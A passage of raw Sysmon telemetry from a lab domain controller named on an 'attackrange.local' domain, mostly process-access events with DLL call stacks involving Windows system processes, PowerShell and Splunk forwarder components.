ystem32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:48.992{59A5CD1D-93F9-6005-F204-00000000A301}42963788C:\Windows\system32\sihost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\Syst
em32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:48.992{59A5CD1D-93F9-6005-F204-00000000A301}42961312C:\Windows\system32\sihost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+386f0|C:\Windows\System32\modernexecserver.dll+2ff00|C:\Windows\System32\modernexecserver.dll+1e81d|C:\Windows\System32\modernexecserver.dll+1e514|C:\Windows\System32\modernexecserver.dll+49142|C:\Windows\System32\modernexecserver.dll+14a47|C:\Windows\SYSTEM32\ntdll.dll+3a950|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9418-6005-1905-00000000A301}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:48.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:48.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9418-6005-1905-00000000A301}6340C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9418-6005-1905-00000000A301}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.695{59A5CD1D-9418-6005-1905-00000000A301}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.601{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.601{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:48.538{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.538{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.179{59A5CD1D-9418-6005-1805-00000000A301}71447148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.179{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u31h3lyz.2v4.ps12021-01-18 13:58:48.179 10341000x800000000000000013403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9418-6005-1805-00000000A301}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
